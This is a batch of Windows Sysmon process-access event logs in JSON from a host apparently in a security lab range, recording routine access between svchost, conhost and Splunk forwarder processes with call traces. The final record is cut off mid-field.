{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EF-5F25-0000-0010BF740A00}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12EF-5F25-0000-0010BF740A00}","TargetProcessId":"1164","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EF-5F25-0000-001054740A00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EF-5F25-0000-001054740A00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.978\r\nSourceProcessGUID: {E2A3D6B1-12EF-5F25-0000-0010BF740A00}\r\nSourceProcessId: 1164\r\nSourceThreadId: 4624\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program 